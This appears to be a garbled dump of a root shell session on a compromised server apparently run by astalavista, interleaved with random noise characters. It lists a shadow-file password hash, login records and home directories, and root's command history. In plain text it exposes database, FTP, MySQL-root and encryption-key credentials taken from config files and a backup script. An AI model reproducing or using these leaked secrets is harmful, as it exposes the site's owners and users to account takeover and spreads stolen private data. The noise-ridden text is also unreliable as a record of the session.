astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
% A3 e5 S+ j+ f- V" B
& P" H4 I; L& o! ]4 Z0 `$ R9 P- X! ush-3.2# cat /etc/motd
: I5 r& C& m E#####################################################
) T6 @/ ?. X, F6 F* V# c p#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
5 X& Q: E Z2 ]' Q3 y# |__| [__ | |__| | |__| | | | [__ | |__| #" G: T6 m' r; g0 e8 U+ \7 I
# | | ___] | | | |___ | | \/ | ___] | | | #2 q6 B o0 A6 F5 u6 i
# #
5 o8 D! w: G% U/ z; e#####################################################
- v+ _( r8 K$ r, h! M# #* K1 U( J( A$ s& d9 m0 ] K; ]/ l4 G
# Admin Contact - 链接标记support@secureservertech.com #
' r. R0 h: c8 A/ K6 `3 i) W# #
! ^& D$ E" x8 Z5 @: ~# Available ShortCuts #
% M3 p8 Q# Z# L! w# `# #
( }5 I# ?) T) Q! ]% a# nst - list active connections #
3 [) N5 R0 v( N( o# ddos - shows how many times each ip is connected #7 I) E# k, ]3 V& K! v) N2 r
# ltr - restart the webserver #
; L( b! H' B {( w- {: W% ~- O# phpc - edit the php config file #( V' e$ ^: p+ o1 d6 u5 P
# htc - edit the webserver configuration file #
' Z2 H5 k2 a' [# up - uptime #5 o0 Z% Y, {/ I3 ~3 A* f
# etd - edit the motd of the day file #
P$ l" j- o! G# htr - start and restart apache if needed #
( F5 b) g/ z2 p. @, |/ T# syng - shows active SYN_RECV connections #
7 H! I6 q7 l7 B6 Z* _. S% X# synd - syn flood blocker - “synd -h” for usage #1 g+ v M9 e/ G& u4 K* l
#####################################################+ _9 B/ p3 h& M5 m2 U+ y8 l
# NOTES: #
; I- T2 |7 G: k1 C! l& n/ n# Last Upgrade - 12-08-2008 by JF #
$ o1 e6 k' ]( t9 }9 F5 v# My.cnf/Mysql Optimization - 1-28-09 #$ m$ o4 b2 s* {
# #
, ]5 ~1 u* U6 P# O. m6 ]# #
. ?# g3 j+ Y( t" E" ?5 W# #
) l* f* A1 L9 a2 `: _, p" p' D#####################################################9 e0 N- U% I" t: e- J( p6 j
- y8 x# e# z0 x9 S
sh-3.2# lastlog | grep -v Never
0 Y2 ^& r9 @# d! t) oUsername Port From Latest
; d2 _7 d, K3 |6 n6 O6 F4 Wroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
, Z6 N; D# n4 ]! Ladmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008. y" P! z3 ^9 A1 C( C; q0 T
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20093 m- Y# ~0 g" V
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20096 Z/ r) n$ r- G4 y5 U3 \( q! y$ n
0 D- @9 W# G& o& u
sh-3.2# ls -la; Q3 O& k: i* v5 `6 Q
total 453376. w8 ~/ `6 h! o0 n4 |* t
drwxr-x— 15 root root 4096 Jun 4 08:40 .
- u; d/ Z$ q( S5 l. t, ~$ O. adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 F- K0 b, V- V% R9 o% y
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
/ y' {$ V# I. u" k& w& Z- q# Q-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
7 Y$ A3 S0 x' J9 ~-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
& m" o, g; ]5 @- D3 ^1 N-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout7 [* W, z; r2 i( O8 {
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile' ~6 }! P1 \" i. d( X2 V4 Y% U
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
$ | M- s5 |& a$ g/ W: I-rwx—— 1 root root 1899 Oct 28 2007 bk.sh4 y/ x1 K. p& S+ X
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
; j0 c7 Y; p( S6 y9 A$ o-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql* p* J( ]2 A7 U1 R5 T# `
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan6 X. K& V" \2 j5 w% i) j4 ~- @) B
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
4 c- w' L5 ? x- [/ `-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql# ]) Z4 {, Z( e
drwx—— 2 root root 4096 Oct 28 2007 .elinks9 A' O2 T* n0 G# v. T
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
( r7 g3 B2 R3 ?' L/ z-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
. n* k! v2 m2 Y" ?0 o4 ]/ ~7 {% W2 l-rw——- 1 root root 0 Apr 16 13:19 .history
6 t- G6 D4 r+ c) a: {-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
9 [' ^8 T& U8 N1 S% Q4 r-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog# O9 w$ t; d5 q, R& ^
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
5 ]' l$ Y) u7 k0 z9 q% y-rw——- 1 root root 35 Jun 2 14:23 .lesshst
0 I( D4 c9 N0 a- x& Ldrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp% [; F X2 \" Z9 R( F
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
+ ]5 G# G+ C2 r" I-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
G1 F, M0 a: k. V# R" b-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz21 k' q% y- x+ e' C. ?9 j
-rwx—— 1 root root 760 Sep 18 2008 lp- s$ ]3 E& O' k- b
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.19 V" c' L5 Q6 \ s
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz/ H2 @; n- H/ P: ^7 I
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1* R: o( b* Y& p$ w
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.97 G8 h, `; a: q0 P
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
% }5 E* R8 J9 C* B! P# qdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
" a) m5 g3 ]2 B% L) _9 q-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz$ j+ V6 K" R% A1 l8 z
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
. J7 Z: y7 ~6 e- _# _6 S7 ]3 E-rw——- 1 root root 41 Oct 19 2007 .my.cnf
5 j& B7 ^) O1 m! L/ M$ f" z-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
* V/ z1 e0 b0 o6 Y( x7 w-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
' S# C' u. W' ]# T" r-rw——- 1 root root 41 May 20 2008 .mytop
" M) ^% w: u4 z% M" fdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
8 c7 b* c- U& d! P9 N: b; r6 B6 z-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz1 k: e' \6 i k# ?* a, J: @; X; S( I
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp9 v+ \7 f% D/ n& y
-rw——- 1 root root 1462 Sep 21 2007 opt.php j( \& `' W$ |1 m
-rw-r–r– 1 root root 3371 Sep 22 2007 p5 P' P$ d% m- b, u; X' \, ?. B
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
& c" e, a, v- [4 _3 Z* c1 D-rw——- 1 root root 1024 Feb 3 21:32 .rnd% ~1 X1 f0 X+ I5 Z$ E% v( r) P; L
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
" u y8 ~. V4 x- b4 W+ E-rw-r–r– 1 root root 887 Nov 28 2007 server.key
( F+ D) n' z9 ydrwx—— 2 root root 4096 Oct 10 2008 .ssh
% i+ z) z6 n: i-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
7 F- o: y4 ~2 ~) W, M9 d& U7 G-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
0 H2 q& B# b5 D-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
7 j) i1 N+ l: O! Y+ F/ J, v-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. _( D/ Y! ^! c4 l; ]' B
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp2 q3 A3 f; c; K5 P7 }( k* x, Q
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh- |5 O8 d2 u% n+ ]! _/ {
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0/ C, a+ w1 \! E* R$ @( z; j1 h' i
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2/ \ U+ u- m4 j: A
-rw——- 1 root root 12997 May 16 2008 .viminfo
& _! C7 S+ K' ?- H; E4 a: I
$ G+ Z5 F, p) ^: Y" i/ Ash-3.2# cat .bash_history
6 |4 F2 Z: W$ `% @8 n0 F; }[snip]
& k: n0 t* ~: ?3 Mwget cp4sst.com/sstlinux.tar.gz5 [7 E- ]2 m9 R" x
tar zxvf sstlinux.tar.gz5 U) Q1 e( Q' X; c
cd linux-2.6.27.10' P2 g2 `! T: I; B1 s
sh install.sh0 J, a8 K+ Y# Q- o' a
make bzImage ; make modules ; make modules_install ; make install$ z# Y% _, l0 I1 L* `
make clean
( }$ q, }) U" sservice mysqld restart( d8 C$ u" F( W' b/ I9 U
[snip]3 ^( }$ Y( [* P& T# k
cd /usr/sbin/. g) T/ d3 O& k! Y/ Y9 k6 i; c
chmod 4777 traceroute
7 X {+ a. i; H5 J; N- @* xchmod 4777 ping
3 l8 ^5 [5 C+ U' R4 M5 dtraceroute -I 链接标记[url]www.astalavista.ch[/url]
" C- i3 D; J# c[snip]) U6 F; Y, u: q0 C% J8 q
vi /etc/csf/csf.conf
) L, h. o7 i2 n$ l! Rtraceroute google.ch! k0 I! N4 I0 n1 ]
service csf restart
: _# ]# j* ?: m4 I) h* Atracert google.ch" Z4 i' _; Z2 g8 S# M
service csf restart5 D: F9 _6 N1 B
traceroute 链接标记[url]www.google.ch[/url]
, k- @8 |& B9 x4 B; E0 c( N# rtracert 链接标记[url]www.google.ch[/url]/ u; P8 F+ J0 k1 s
traceroute 链接标记[url]www.google.ch[/url]: N2 ?2 V( }6 K' p1 _. ~
locate traceroute- |" [ }( l, ]& w3 p8 ]
chown 4755 /bin/traceroute
9 e$ g( E$ @8 R9 X; Q6 v; ichown 4777 /bin/traceroute
& y- u4 r$ b" k- j6 `0 n& Jlocate ping. N$ q% A: Y, ], _2 p9 G9 ^
chown 4755 /bin/ping# ^# D( S4 ` e3 b5 l/ Q
chown 4777 /bin/ping; a& F- z6 z( Q( w) k' P
cd /bin/
2 |/ H& m3 |# R" j3 Mls -ali | grep ping
; P [- p1 }* ?# f8 c, B: r- |chown root ping
6 l D. G2 Y+ z" S( i$ wchmod 4755 ping4 `) p# d& n% w/ c$ ~# ?
ls -ali | grep traceroute% o" V% b+ F1 S3 t, K
chown root traceroute6 I2 J6 o) e: P! ?* m5 J- r; i
chmod 4755 traceroute
/ t4 O6 k1 x: x% _* h2 ?0 i; _ls -ali | grep traceroute
- I. Z, ?0 G5 {6 y u" m& @2 Jtraceroute -I 链接标记[url]www.google.ch[/url]
3 b0 o! I6 R& I: Atraceroute 链接标记[url]www.google.ch[/url]
8 \! C1 N; \8 W& Jwhois pmsantos.ch2 ~7 y. }. X$ `1 Z
[snip]
J6 v4 T7 ]1 ~2 ]/ lmysql -h com_contrexx2_live < /root/defaultp_ports.sql
|9 G; |9 h7 g6 ^( x5 E; Ymysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
8 U" v* X2 Y* c* Dmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
8 z. d" U, f: K$ ~. fmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
& D" L9 t- ]( m2 @5 p& |7 ytop' f. O7 t/ a9 ?9 e: C) }9 t" Z# o
ping ssth.ch' o1 q7 F: L9 N0 J/ T) `7 W3 G
ping asdlkfaljgasd???ljg???lasj.ch
+ q5 ~5 ]) m# {& y3 F; cping asdlkfaljgasdlasj.ch/ f5 o7 y4 x+ J* o- }
ping 链接标记[url]www.ssth.ch[/url]) }& |1 t+ }) H! G8 B( @
ping ssth.ch' O' T: ?) f8 P9 R
nslookup 链接标记[url]www.google.ch[/url]
. z7 F& ^) u; k _( mnslookup 链接标记[url]www.ssth.ch[/url]
3 ]5 ~( G* E/ y/ A$ \man nslookup
5 r9 O& n! L: bping 链接标记[url]www.google.ch[/url]
2 Q8 j2 y3 y" r$ C J+ }nslookup 链接标记[url]www.google.ch[/url]
6 ?6 }! V) s& [9 D! _' u- S8 enslookup 链接标记[url]www.google.ch[/url]
2 T# Z: K. s3 s# c& I1 unslookup salfjasdlf.ch! r& J$ R: x1 u( T" a1 R
[snip]! D" I8 n. k9 S* {+ `
openssl passwd -1 sadf
7 m4 d- F/ d2 ?openssl passwd -1 5cZNHstdTy" j, @ H+ a; v0 g y5 s3 s
mysql, c6 W' z( I; V( x. V& I
mysql
1 |! r. a1 b! }' z& Hlocate proftp
2 N- G" h6 H# \! e9 Y" avi /etc/proftpd.passwd
' U# A' J& D P& p, }3 V! _service proftpd restart
+ p& q/ F) E* H8 V6 C, f2 flocate proftpd.conf. t( g0 h; `4 P! ?- s7 t! a
vi /etc/proftpd.conf/ Y; v w0 M# _* @/ _7 o1 [( |
vi /etc/proftpd.passwd
( a% X6 f( W7 k8 U6 S1 Yservice proftpd restart, m8 M1 X+ R8 V# s3 _
[snip]" }3 A, y$ `3 p; B
/bin/sh /home/com/backup_system/backup.sh3 T m0 y3 q$ D
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
, {3 k7 _9 w1 x* W4 lmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql2 p; q* q$ Z4 U. x
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
) o1 n" b1 ^% l+ L6 Als -ali) p m. O- i0 q/ u
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
: r! U, l0 _8 K# W/ pmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
6 V6 W) [7 h3 |5 v2 \: acrontab -l; _) l! S2 M) i4 p3 | e
crontab -l
) W: U% V( S. c4 a/ n) Iphp -q /home/com/public_html/modifications/cronjobs/securitynews.php" {2 v+ G6 P) m. `3 k: Z' c/ X
/home/com/public_html/modifications/cronjobs/exploits.sh
$ J$ C, p2 y- [2 T* x0 L+ f+ ]wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]6 b, c5 T8 w" j8 u
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz& j0 |3 n- `7 K7 }) ]3 z Q
cd lsws-4.0.3
: Z! d# A' x) }* Z" y, Z; L$ Ysh install.sh
, r2 Q# S; w, J& w& m5 @uptime6 J5 o; V6 Z) X `; _2 \/ z
hdparm -tt /dev/sda: X( [" S& Z" a9 g- A" i* i
iostat! x: h0 z' J \. w- a& l
yum install iostat4 k2 b( ] M3 x" \& _2 q
iostat
; K! U# O6 ?& a3 `( \whereis iostat6 ]* J: [: S) x) G. m9 B
yjm clean all% \5 N$ M& e( ?0 A
yum clean all ; yum -y update7 ^9 Y9 C5 J w( C" |& r
iostat4 h+ z8 K4 _0 d9 I4 w
yum install systat' h- V6 {0 N3 ?
rpm -qa | grep iostat' Q9 V8 s/ M' a% \3 @
rpm -qa | grep sysstat9 ?* @' h% v, x- E
rpm -qa | grep systat
: w1 p a1 |9 W' {/ k2 Zdmesg -c& K# ?! s8 z0 B6 { _' i! R
sysctl -p
' _8 Z) `5 d' J- Suname -r* L D; Z t; o8 F7 Q) V- ?0 B( O. |
cd /usr/src: t/ d9 F/ p$ n4 T ?
wget nix101.com/kernels/sstlinux.tar.gz
& |2 n) b: U# d( B/ Fshutdown -r now9 u3 z5 L' T) c: F6 e1 g, U
nano -w /boot/grub/grub.conf
2 w' p/ B, [2 `/ U
9 e% f' N2 A" b" {/ ^' ush-3.2# cat .my.cnf- R- o3 m( d3 F& }& O
[client]
- z& T3 y2 { D# m4 iuser=da_admin' a& c h1 n! x, c
password=X9dctmRH
3 f4 t7 T5 [; `: {
# ]+ L6 ]0 h! K, Dsh-3.2# cat /home/com/backup_system/backup.sh6 C% {: C' S$ x" j( D
#!/bin/sh
3 R; o. l& r! c" e2 x3 a: ], h9 g#####################################################################. S2 O0 m# b9 k, l0 t% p$ i9 x
# #
& V; d, I* W2 O- s# incremental backup for astalavista.com #
$ @* l! Q% l' L1 R# #0 Q2 z8 m& Z. {5 }& D
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #7 P) G" F, ?( V2 G
# #
H2 e, U6 I8 M! `5 E j& _* ~#####################################################################
! J+ R6 M }& v2 \2 D[snip]/ j" ]9 j4 R* g
PROG_DIR=”/home/com/backup_system”;+ l* g b& l% k6 C. S) {
BACKUP_DIR=”/home/com/backups”;# D% s# w$ ?# Z4 @
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;4 S: G$ s# Y9 t3 q: E& C& j7 k
# ftp for synology backup server
, Y; S, ?( ~* U1 A+ B0 c9 [FTP_HOST=”212.254.194.163″;
% Y$ j1 H1 N. T6 x, [4 }1 e& G4 Z" yFTP_PORT=”21″;
* O8 B- ^9 h5 a; S* BFTP_USER=”astalavista.com”;2 s% N) ]$ S- H; _% M4 [, ?9 \, c
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;" Q q. R* b. r( m
FTP_DIR=”/astalavista.com”;! ^. q/ g) F2 ~/ N4 X
# database
0 _& H/ m. l8 J! l% kDB_HOST=”localhost”;
" O, A. }/ x s& e* x- r6 m5 J" eDB_USER=”contrexxuser2″;# ?5 {; x( x; B$ e! E) o$ v5 f
DB_PASS=”0fEYNZgXz1pKe”;( n. Y* X4 G- h' K
DB_DATABASE1=”com_contrexx2_live”;4 h) n8 N( O) Y9 F. S7 a
DB_DATABASE2=”com_contrexx2″;
' g9 ]# E4 |0 N[snip]6 i! o& Y+ H% l4 {9 y
ftp -in $FTP_HOST $FTP_PORT <<EOF
# T! u6 m! m, P3 r$ a. `quote USER $FTP_USER
5 M- r5 o: {" Y' B( S7 _: M5 `$ Lquote PASS $FTP_PASS/ r9 G7 Y3 } c, `% g
cd $FTP_DIR8 m3 E& A$ Y1 }& _
put $DB_FULLNAME-SQL_Dump.tar
6 h3 N3 s. O" A4 B/ e5 [* aput $BACKUP_FULLNAME-Public_HTML.tar
; T" x. ~ R- G, x0 P* F( J* x0 Aclose
( W1 o7 P# o4 e3 }/ X7 q* d% a1 }bye
- Q* u) ?/ J8 v, V1 cEOF% z, G9 J* A- m6 v; o6 r$ i# }
3 ?# R5 ^8 C! v$ s E5 ssh-3.2# cd /home2 I- f Z6 ^- l% C4 S# ~3 a6 b
sh-3.2# ls -la
4 g& s* _9 u. wtotal 120, c* Q2 o- Z, d6 b8 E8 c6 N& J( s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
! J# a3 s$ P' x- rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 G1 u# G0 s3 E4 y7 {' U, p- {drwx–x–x 9 admin admin 4096 Nov 28 2007 admin+ n' u Z! c( D9 ~5 U* c! m2 Z+ Q
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group b8 q7 r7 Y. ]. C& S+ C$ {
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
: N3 a- Y8 M% P! i/ X+ G/ |6 Qdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
, a, ` H+ n# M. q, E! ]drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
+ o( W, E( z& K4 p% N. }: Xdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
2 |% \6 _7 |2 ^( |: _( sdrwx–x–x 10 com com 4096 Apr 28 12:40 com
7 e$ v2 B) T. X& F, Idrwxr-xr-x 2 root root 4096 May 17 2007 ftp
$ J2 ^% }0 W' c5 v& Vdrwx—— 3 jon jon 4096 Sep 21 2007 jon: K. r: N% \' q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
& K' S0 }" a" u) cdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 H8 `: |: D$ D. i# g) U9 gdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
* g" P6 @6 `* v9 F' o* m vdrwx—— 2 jon jon 4096 Sep 15 2007 test3 y* C% n6 { D: G
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp9 c& |$ m! w0 W0 d2 ]9 z o
( W) J0 K6 x- ^4 i/ ?sh-3.2# cd admin- ? L( I+ |' S6 R; K
sh-3.2# ls -la3 v& F# @3 e( B4 E0 |9 p
total 1735896
1 U! i$ k' b3 `7 ddrwx–x–x 9 admin admin 4096 Nov 28 2007 .
7 y+ G# \- X6 y8 ~0 G6 vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! K+ w# c& M4 K3 z! wdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
! H1 M, ^( b. s5 t6 H( Mdrwx—— 2 admin admin 4096 Sep 28 2007 backups% J* y: a+ T6 e) @; R, i& V& G
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history: R" h6 O# ]& S# N7 [. ^/ n, w- ]
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
, b& t) e% |( @' l# b. d-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile4 o N! L) s2 G# J
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
" F" T" b% {$ s# d& o/ Hdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
5 @; i* G8 q+ l' G$ q) Q/ ?drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
# ~! g5 P3 s$ vdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
) B% }2 N' ~; c-rw-r–r– 1 root root 24 Sep 21 2007 info.php
8 Y- _. r8 e) b0 S3 F% O( ^drwx—— 2 admin admin 4096 Sep 21 2007 mail0 G: U/ B N6 e2 @0 o
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% _! S! V/ ~$ \7 s9 T-rw-r–r– 1 root root 887 Nov 28 2007 server.key
% t [& m* O( E7 R! Y-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
1 T2 }7 B, K3 Z. `) m-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz9 e% b% _3 O) `- Q4 S
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups9 I% a( g! m1 k ], S
S4 B: S, x1 k; [8 M. ]1 H
sh-3.2# ..
4 I& c3 H/ \2 dsh-3.2# cd jon/ |: [3 h- h% p3 |* l+ e
sh-3.2# ls -la
7 S( y6 }6 f) O3 x5 v! j atotal 36+ e+ f( F. k- P9 u" o
drwx—— 3 jon jon 4096 Sep 21 2007 .9 v. b" Z! \: L" p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 ~" e/ M, v; V
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history/ k3 E) s$ ^$ `* a, M( |6 `) J
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
4 [, z$ B- o0 y+ |; J4 d-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile; R& m) z; U7 L% ^+ [! a& t
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
6 s9 o* x4 t* U7 _& x; Y+ g) ^% j-rw-r–r– 1 root root 24 Sep 21 2007 info.php
1 w: ?% J, |5 u! U; }+ pdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
3 O/ f4 g7 F d" s1 U
! ^* ?, X& `$ B1 \" lsh-3.2# cd ..7 a/ ]/ c7 H' P# r) b' h
sh-3.2# cd test
5 ~0 V/ |% r/ N4 T5 Qsh-3.2# ls -la
6 V" l( D3 ?3 [: I7 U' ]total 48. |. A5 |0 b4 R! G
drwx—— 2 jon jon 4096 Sep 15 2007 .
P% U/ k0 \! q$ rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, q; k' K9 z9 ]-rw——- 1 jon jon 79 Sep 21 2007 .bash_history: r' N. R; V4 H, L
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
& _3 I* Z+ A0 P, s/ S# h* I-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile. C8 B( b( ?! S5 M+ z
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc1 w1 @$ a/ o# [2 L S& r# q
sh-3.2# cat .bash_history" H: z7 Q! W, Y9 B
/usr/bin/mysqladmin -u root password PoliuJhytg67- Q" u: I5 }& Z5 Y
& n7 T/ T. h$ F; e4 Hsh-3.2# cd ..% J* _: s2 x: |7 s$ T# ^
sh-3.2# cd astanet
6 k, E' |8 Q: p% Y7 V6 e" `& wsh-3.2# ls -la
: |/ _$ l6 W& [5 U" Ototal 52
" \$ H5 F0 W5 z+ e" K M" y) g5 Wdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .5 Q m* ~, B% p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 I, X( k1 H: o4 c- k* g% vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
3 h) v! _5 |' o. M9 F% I- G-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history( y. d i( a _ |: a" X
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
+ t8 A$ V' v& Z-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile8 H" `! j, U" Y7 x+ l% ]6 Q* J
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc. w. {6 w: w: P
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
* g* d( J% B2 h) z5 U! @3 w4 rdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ b) ` H! u) g: s" n f
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
* j. d1 B" O; e2 v& U a/ H. |-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history6 `# |" w$ t$ q W9 r
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html- v, ^+ ? P, R: F, A( Z
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow0 [4 w, Y9 I1 {5 I
8 U4 [; _) t- ^& v9 O) R+ csh-3.2# cd auth/7 M o s/ ~1 ^" Y. G
sh-3.2# ls -la
, o% h4 j- j/ c+ `, A3 ttotal 28; { I/ h5 Z# q" x. x( p
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
: D: b- f4 t, y! O+ Ldrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
" Q) K+ t. D4 z4 a' `-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php `* g2 I1 ]0 A- X* e
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php3 u* w# L5 D Z5 F+ T
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd8 B% w" _6 g& W+ \6 k
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting6 X% y6 l+ J5 a+ \
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
9 n1 v+ F; J2 @/ b( J% \
0 ~2 s6 {5 j0 F- ~9 esh-3.2# cat hackercontest.config.inc.php8 l8 j" y. D/ n1 M5 g" i1 ]
<?PHP! g3 m# H. j. q' b
// Variabeln f?r Verbindung zur Datenbank //
2 {' h/ l p% L$conxHost = ‘localhost’; // MySQL hostname% o/ O9 p1 i+ p% t! k
$conxUser = ‘hackercontest’; // MySQL user
$ T( P. L7 _, T U& \$conxPassword = ‘K6m@7dUc’; // MySQL password+ H' n! H9 V5 j3 J6 |
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! J; c; \. R& R( z y/ k8 J?>
# y2 f6 ~, a) }( f Gsh-3.2# cat hosting.config.inc.php) G5 o, f+ O% _* E0 L/ c0 G
<?PHP6 \8 p$ o% @' O% p: \. j$ S' o
// Variabeln f?r Verbindung zur Datenbank //4 B0 L v% O) O# y9 B8 K c# z
$conxHost = ‘localhost’; // MySQL hostname
9 x2 B" {$ A8 c7 O% n) r3 P$conxUser = ‘hostinguser’; // MySQL user
5 `' z5 Q4 v- ]; } v; c4 t1 y$conxPassword = ‘cXvB3981′; // MySQL password
" S2 K0 ?; y1 X% l$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# ]0 r1 c9 e- r6 S3 `3 R3 T
?>
{2 u" Q4 z/ Z; T8 V" |' V
# q! [# N- u: b8 k. @! zsh-3.2# cd ..- X+ x- E5 h9 {
sh-3.2# cd com1 Q& }$ z7 `" G ~6 X
sh-3.2# ls -la
# r; n# p3 E0 Mtotal 141208
